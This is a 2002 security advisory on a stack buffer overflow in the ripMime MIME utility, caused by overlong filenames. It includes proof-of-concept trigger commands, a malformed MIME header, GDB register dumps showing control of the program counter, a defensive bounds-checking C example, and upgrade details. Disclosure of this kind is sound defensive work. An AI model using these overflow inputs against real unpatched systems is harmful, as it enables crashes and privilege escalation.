
RipMime buffer overflow when handling an overlong filename in a MIME header


Published: 2002-01-28
Updated: 2002-01-28
Severity:
Threat: privilege escalation
Error type: boundary check error
Exploitation: server mode

BUGTRAQ ID:3941

Affected systems
plDaniels ripMime 1.2.0
plDaniels ripMime 1.2.1
plDaniels ripMime 1.2.2
plDaniels ripMime 1.2.3
plDaniels ripMime 1.2.4
   - FreeBSD FreeBSD 5.0
   + plDaniels Inflex 1.0.10
plDaniels ripMime 1.2.5
   + plDaniels Inflex 1.0.11
plDaniels ripMime 1.2.6
   + plDaniels Inflex 1.0.11
Detailed description
ripMime is a small utility that ships with the Inflex email virus scanner; it is also included in the commercial XaMime product.

When ripMime processes a filename, passing a filename of more than 2079 characters as the argument to a command-line switch corrupts the stack and causes a buffer overflow, which can lead to privilege escalation.

Test code
The following produces a BASE64 decoding error:

./ripmime -i mail -d `perl -e 'print "A" x 255'`
Error: Cannot open output file
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA_
for BASE64 decoding.Segmentation fault

A header with a malformed BASE64 filename can be used to trigger the buffer overflow, for example:

Content-Type: application/octet-stream;
name="blah"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename=AAAAAAAAAAAAAAAAAAA....<2000 total chars>
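As an added defensive illustration (this is example code, not ripMime's own code nor its 1.2.7 fix), the following C function extracts the filename= parameter of a Content-Disposition header into a fixed-size buffer and rejects a value that does not fit, which is the missing bounds check behind the overflow described above. MAX_FILENAME, extract_filename and the two helper names are assumptions of this example; it also handles the quoted form of the parameter, which the advisory's sample does not show.

```c
#include <string.h>

/* Hypothetical limit for this example; the advisory gives the ~2079-byte
 * trigger length, not ripMime's own buffer sizes. */
#define MAX_FILENAME 255

/* Copy the filename= value of a Content-Disposition header into a fixed-size
 * buffer. Returns 1 on success, 0 if missing, malformed, or too long. */
int extract_filename(const char *header, char *out, size_t outlen)
{
    const char *p = strstr(header, "filename=");
    size_t n;
    if (p == NULL || outlen == 0) return 0;
    p += strlen("filename=");
    if (*p == '"') {                      /* quoted value */
        const char *q = strchr(++p, '"');
        if (q == NULL) return 0;          /* unterminated quote */
        n = (size_t)(q - p);
    } else {                              /* bare token, as in the PoC */
        n = strcspn(p, "; \t\r\n");
    }
    /* Length check before the copy: reject rather than truncate so the
     * caller sees the bad input instead of a silently mangled name. */
    if (n >= outlen) return 0;
    memcpy(out, p, n);
    out[n] = '\0';
    return 1;
}

/* 1 if header yields exactly `expected` within MAX_FILENAME, else 0. */
int demo_extract(const char *header, const char *expected)
{
    char buf[MAX_FILENAME + 1];
    return extract_filename(header, buf, sizeof buf) && strcmp(buf, expected) == 0;
}

/* Constructed input: a header whose filename is `len` 'A's, like the PoC.
 * Returns 1 when extract_filename rejects it, 0 otherwise. */
int overlong_is_rejected(size_t len)
{
    char hdr[4096] = "Content-Disposition: attachment; filename=";
    char buf[MAX_FILENAME + 1];
    size_t pl = strlen(hdr);
    if (pl + len >= sizeof hdr) return 0;
    memset(hdr + pl, 'A', len);
    hdr[pl + len] = '\0';
    return extract_filename(hdr, buf, sizeof buf) == 0;
}
```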

Using GDB we can see the following registers being overwritten:

(gdb) r -i mail -d `perl -e 'print "A" x 79'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/ripmime-1.2.6/./ripmime -i mail -d `perl -e 'print "A" x 79'`
Error: Cannot open output file
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA_
for BASE64 decoding.
Program received signal SIGILL, Illegal instruction.
0x4141415c in ?? ()

...

r0             0x4141415f       1094795615  
r19            0x41414141       1094795585
r20            0x41414141       1094795585
r21            0x41414141       1094795585
r22            0x41414141       1094795585
r23            0x41414141       1094795585
r24            0x41414141       1094795585
r25            0x41414141       1094795585
r26            0x41414141       1094795585
r27            0x41414141       1094795585
r28            0x41414141       1094795585
r29            0x41414141       1094795585
r30            0x41414141       1094795585
r31            0x41414141       1094795585
pc             0x4141415c       1094795612
lr             0x4141415f       1094795615

Solution
Upgrade to version 1.2.7 or later. For every affected release (plDaniels ripMime 1.2.0 through 1.2.6) the vendor upgrade is the same:

plDaniels Upgrade ripmime-1.2.7.tar.gz
http://pldaniels.org/ripmime/ripmime-1.2.7.tar.gz

Related information
Credit: KF <dotslash@snosoft.com>.
Reference: http://www.securityfocus.com/archive/1/251989
Related page: http://pldaniels.org/ripmime/#workswith